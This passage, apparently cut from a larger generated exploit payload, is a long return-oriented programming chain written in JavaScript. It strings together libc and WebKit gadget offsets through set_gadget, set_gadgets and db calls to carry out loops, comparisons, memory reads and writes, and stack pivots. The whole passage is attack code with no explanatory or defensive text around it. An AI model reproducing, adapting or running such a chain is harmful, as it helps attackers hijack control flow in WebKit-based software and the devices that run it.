libc_base+764760, //pop rsi ropchain+231808, //L4124 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L4123: db([0, 0]); // 0x0 set_gadget(webkit_base+3236123,); //pop r9 //L4124: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L4125: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L4126: db([0, 0]); // 0x0 set_gadgets([ webkit_base+15691302, //movsxd rax, edi libc_base+764760, //pop rsi ropchain+231936, //L4128 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+231920, //L4127 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+144605 //pop rdi ]); //L4127: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L4128: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+759608 //pop rax ]); //L4129: db([1, 0]); // 0x1 set_gadget(libc_base+764760,); //pop rsi db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+759608 //pop rax ]); //L4130: db([10, 0]); // 0xa set_gadget(libc_base+763368,); //pop rcx //L4131: db([10, 0]); // 0xa set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760 //pop rsi ]); db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+848070, //shl rax, cl libc_base+764760, //pop rsi ropchain+232136, //L4133 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L4133: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760, //pop rsi ropchain+232192, //L4134 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L4134: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi webkit_base+14664103, //and rax, rcx libc_base+764760, //pop rsi ropchain+232328, //L4138 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+232312, //L4137 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L4136: db([32, 0]); // 0x20 set_gadget(webkit_base+3236123,); //pop r9 //L4137: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L4138: db([0, 0]); // 0x0 set_gadgets([ libc_base+848070, //shl rax, cl libc_base+848080, //shr rax, cl libc_base+764760, //pop rsi ropchain+232448, //L4141 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+232416, //L4139 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L4139: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L4140: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L4141: db([0, 0]); // 0x0 set_gadgets([ webkit_base+21212296, //cmp rax, rsi ; sete al libc_base+226597, //movzx eax, al libc_base+764760, //pop rsi ropchain+232584, //L4143 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+232600, //L4144 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+232568, //L4142 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+3236123 //pop r9 ]); //L4142: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L4143: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L4144: db([0, 0]); // 0x0 set_gadgets([ webkit_base+15691302, //movsxd rax, edi libc_base+764760, //pop rsi ropchain+232760, //L4149 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+232776, //L4150 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+232712, //L4146 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+144605 //pop rdi ]); //L4146: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L4147: db([0, 0]); // 0x0 set_gadget(libc_base+763368,); //pop rcx //L4148: db([0, 0]); // 0x0 set_gadget(webkit_base+3236123,); //pop r9 //L4149: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L4150: db([0, 0]); // 0x0 set_gadgets([ webkit_base+21212296, //cmp rax, rsi ; sete al libc_base+226597, //movzx eax, al webkit_base+5507491, //shl rax, 3 libc_base+764760, //pop rsi ropchain+232888, //L4151+8 libc_base+501454, //add rax, rsi libc_base+501611, //mov rax, [rax] libc_base+764760, //pop rsi ropchain+232880, //L4151 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+782311 //pop rsp ]); //L4151: db([0, 0]); // 0x0 set_gadgets([ ropchain+232904, //L4151+24 ropchain+233304, //L4145 libc_base+764760, //pop rsi ropchain+232944, //L4152 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 libc_base+763368 //pop rcx ]); //L4152: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L4154: db([56, 0]); // 0x38 set_gadgets([ libc_base+501454, //add rax, rsi libc_base+764760, //pop rsi ropchain+233064, //L4157 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+233048, //L4155 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L4155: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L4157: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760, //pop rsi ropchain+233208, //L4160 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+233224, //L4161 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+233176, //L4158 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+144605 //pop rdi ]); //L4158: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L4159: db([0, 0]); // 0x0 set_gadget(libc_base+763368,); //pop rcx //L4160: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L4161: db([0, 0]); // 0x0 set_gadgets([ webkit_base+21212296, //cmp rax, rsi ; sete al libc_base+346125, //setne al libc_base+226597, //movzx eax, al libc_base+764760, //pop rsi ropchain+233296, //L4162 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L4162: db([0, 0]); // 0x0 //L4145: set_gadgets([ libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+233424, //L4165 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+233440, //L4166 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+233408, //L4164 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+3236123 //pop r9 ]); //L4164: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L4165: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L4166: db([0, 0]); // 0x0 set_gadgets([ webkit_base+15691302, //movsxd rax, edi libc_base+764760, //pop rsi ropchain+233600, //L4171 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+233616, //L4172 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+233552, //L4168 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+144605 //pop rdi ]); //L4168: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L4169: db([0, 0]); // 0x0 set_gadget(libc_base+763368,); //pop rcx //L4170: db([0, 0]); // 0x0 set_gadget(webkit_base+3236123,); //pop r9 //L4171: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L4172: db([0, 0]); // 0x0 set_gadgets([ webkit_base+21212296, //cmp rax, rsi ; sete al libc_base+226597, //movzx eax, al webkit_base+5507491, //shl rax, 3 libc_base+764760, //pop rsi ropchain+233728, //L4173+8 libc_base+501454, //add rax, rsi libc_base+501611, //mov rax, [rax] libc_base+764760, //pop rsi ropchain+233720, //L4173 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+782311 //pop rsp ]); //L4173: db([0, 0]); // 0x0 set_gadgets([ ropchain+233744, //L4173+24 ropchain+236960, //L4167 libc_base+764760, //pop rsi ropchain+233784, //L4174 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 libc_base+763368 //pop rcx ]); //L4174: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L4176: db([56, 0]); // 0x38 set_gadgets([ libc_base+501454, //add rax, rsi libc_base+764760, //pop rsi ropchain+233904, //L4179 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+233888, //L4177 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L4177: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L4179: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760, //pop rsi ropchain+234048, //L4182 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+234016, //L4180 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+234032, //L4181 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L4180: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L4181: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L4182: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+764760, //pop rsi ropchain+234128, //L4183 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 libc_base+763368 //pop rcx ]); //L4183: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L4185: db([80, 0]); // 0x50 set_gadgets([ libc_base+501454, //add rax, rsi libc_base+764760, //pop rsi ropchain+234248, //L4188 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+234232, //L4186 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L4186: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L4188: db([0, 0]); // 0x0 set_gadgets([ libc_base+224145, //mov eax, [rdi] libc_base+764760, //pop rsi ropchain+234424, //L4191 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+234440, //L4192 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+234392, //L4189 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+234408, //L4190 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L4189: db([0, 0]); // 0x0 set_gadget(webkit_base+3236123,); //pop r9 //L4190: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L4191: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L4192: db([0, 0]); // 0x0 set_gadgets([ webkit_base+15691302, //movsxd rax, edi libc_base+764760, //pop rsi ropchain+234600, //L4196 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+234568, //L4194 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+234584, //L4195 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L4193: db([32, 0]); // 0x20 set_gadget(webkit_base+3236123,); //pop r9 //L4194: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L4195: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L4196: db([0, 0]); // 0x0 set_gadgets([ libc_base+848070, //shl rax, cl libc_base+848080, //shr rax, cl libc_base+764760, //pop rsi ropchain+234688, //L4197 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+234704, //L4198 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L4197: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L4198: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760 //pop rsi ]); db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi webkit_base+6378709, //cmp rax, rcx ; sete al libc_base+226597, //movzx eax, al libc_base+764760, //pop rsi ropchain+234872, //L4200 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+234888, //L4201 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+234856, //L4199 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+3236123 //pop r9 ]); //L4199: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L4200: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L4201: db([0, 0]); // 0x0 set_gadgets([ webkit_base+15691302, //movsxd rax, edi libc_base+764760, //pop rsi ropchain+235048, //L4206 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+235064, //L4207 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+235000, //L4203 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+144605 //pop rdi ]); //L4203: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L4204: db([0, 0]); // 0x0 set_gadget(libc_base+763368,); //pop rcx //L4205: db([1, 0]); // 0x1 set_gadget(webkit_base+3236123,); //pop r9 //L4206: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L4207: db([0, 0]); // 0x0 set_gadgets([ webkit_base+21212296, //cmp rax, rsi ; sete al libc_base+346125, //setne al libc_base+226597, //movzx eax, al webkit_base+5507491, //shl rax, 3 libc_base+764760, //pop rsi ropchain+235184, //L4208+8 libc_base+501454, //add rax, rsi libc_base+501611, //mov rax, [rax] libc_base+764760, //pop rsi ropchain+235176, //L4208 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+782311 //pop rsp ]); //L4208: db([0, 0]); // 0x0 set_gadgets([ ropchain+235200, //L4208+24 ropchain+236584, //L4202 libc_base+764760, //pop rsi ropchain+235240, //L4209 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 libc_base+763368 //pop rcx ]); //L4209: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L4211: db([56, 0]); // 0x38 set_gadgets([ libc_base+501454, //add rax, rsi libc_base+764760, //pop rsi ropchain+235360, //L4214 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+235344, //L4212 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L4212: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L4214: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760, //pop rsi ropchain+235504, //L4217 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+235472, //L4215 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+235488, //L4216 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L4215: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L4216: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L4217: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+764760, //pop rsi ropchain+235584, //L4218 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 libc_base+763368 //pop rcx ]); //L4218: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L4220: db([88, 0]); // 0x58 set_gadgets([ libc_base+501454, //add rax, rsi libc_base+764760, //pop rsi ropchain+235704, //L4223 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+235688, //L4221 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L4221: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L4223: db([0, 0]); // 0x0 set_gadgets([ libc_base+224145, //mov eax, [rdi] libc_base+764760, //pop rsi ropchain+235880, //L4226 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+235896, //L4227 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+235848, //L4224 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+235864, //L4225 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L4224: db([0, 0]); // 0x0 set_gadget(webkit_base+3236123,); //pop r9 //L4225: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L4226: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L4227: db([0, 0]); // 0x0 set_gadgets([ webkit_base+15691302, //movsxd rax, edi libc_base+764760, //pop rsi ropchain+236056, //L4231 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+236024, //L4229 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+236040, //L4230 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L4228: db([32, 0]); // 0x20 set_gadget(webkit_base+3236123,); //pop r9 //L4229: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L4230: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L4231: db([0, 0]); // 0x0 set_gadgets([ libc_base+848070, //shl rax, cl libc_base+848080, //shr rax, cl libc_base+764760, //pop rsi ropchain+236144, //L4232 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+236160, //L4233 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L4232: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L4233: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760 //pop rsi ]); db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi webkit_base+6378709, //cmp rax, rcx ; sete al libc_base+226597, //movzx eax, al libc_base+764760, //pop rsi ropchain+236328, //L4235 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+236344, //L4236 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+236312, //L4234 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+3236123 //pop r9 ]); //L4234: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L4235: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L4236: db([0, 0]); // 0x0 set_gadgets([ webkit_base+15691302, //movsxd rax, edi libc_base+764760, //pop rsi ropchain+236488, //L4239 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+236504, //L4240 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+236456, //L4237 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+144605 //pop rdi ]); //L4237: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L4238: db([0, 0]); // 0x0 set_gadget(libc_base+763368,); //pop rcx //L4239: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L4240: db([0, 0]); // 0x0 set_gadgets([ webkit_base+21212296, //cmp rax, rsi ; sete al libc_base+346125, //setne al libc_base+226597, //movzx eax, al libc_base+764760, //pop rsi ropchain+236576, //L4241 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L4241: db([0, 0]); // 0x0 //L4202: set_gadgets([ libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+236704, //L4244 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+236720, //L4245 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+236688, //L4243 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+3236123 //pop r9 ]); //L4243: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L4244: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L4245: db([0, 0]); // 0x0 set_gadgets([ webkit_base+15691302, //movsxd rax, edi libc_base+764760, //pop rsi ropchain+236864, //L4248 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+236880, //L4249 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+236832, //L4246 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+144605 //pop rdi ]); //L4246: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L4247: db([0, 0]); // 0x0 set_gadget(libc_base+763368,); //pop rcx //L4248: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L4249: db([0, 0]); // 0x0 set_gadgets([ webkit_base+21212296, //cmp rax, rsi ; sete al libc_base+346125, //setne al libc_base+226597, //movzx eax, al libc_base+764760, //pop rsi ropchain+236952, //L4250 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L4250: db([0, 0]); // 0x0 //L4167: set_gadgets([ libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+237080, //L4253 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+237096, //L4254 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+237064, //L4252 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+3236123 //pop r9 ]); //L4252: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L4253: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L4254: db([0, 0]); // 0x0 set_gadgets([ webkit_base+15691302, //movsxd rax, edi libc_base+764760, //pop rsi ropchain+237208, //L4256 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+237256, //L4259 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+237224, //L4257 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+3236123 //pop r9 ]); //L4256: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L4257: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L4258: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L4259: db([0, 0]); // 0x0 set_gadgets([ webkit_base+21212296, //cmp rax, rsi ; sete al libc_base+226597, //movzx eax, al webkit_base+5507491, //shl rax, 3 libc_base+764760, //pop rsi ropchain+237368, //L4260+8 libc_base+501454, //add rax, rsi libc_base+501611, //mov rax, [rax] libc_base+764760, //pop rsi ropchain+237360, //L4260 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+782311 //pop rsp ]); //L4260: db([0, 0]); // 0x0 set_gadgets([ ropchain+237384, //L4260+24 ropchain+240664, //L4255 libc_base+764760, //pop rsi ropchain+237424, //L4261 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 libc_base+763368 //pop rcx ]); //L4261: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L4263: db([56, 0]); // 0x38 set_gadgets([ libc_base+501454, //add rax, rsi libc_base+764760, //pop rsi ropchain+237544, //L4266 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+237528, //L4264 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L4264: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L4266: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760, //pop rsi ropchain+237688, //L4269 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+237656, //L4267 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+237672, //L4268 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L4267: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L4268: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L4269: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+764760, //pop rsi ropchain+237776, //L4271 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+764760 //pop rsi ]); //L4270: db([4294967295, 4294967295]); // -0x1 set_gadget(libc_base+759608,); //pop rax //L4271: db([0, 0]); // 0x0 set_gadgets([ libc_base+501454, //add rax, rsi libc_base+764760, //pop rsi ropchain+237832, //L4272 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 libc_base+763368 //pop rcx ]); //L4272: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L4274: db([56, 0]); // 0x38 set_gadgets([ libc_base+501454, //add rax, rsi webkit_base+20307877, //mov [rax], rcx libc_base+764760, //pop rsi ropchain+237912, //L4276 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L4276: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760 //pop rsi ]); db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+764760, //pop rsi ropchain+237992, //L4277 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 libc_base+763368 //pop 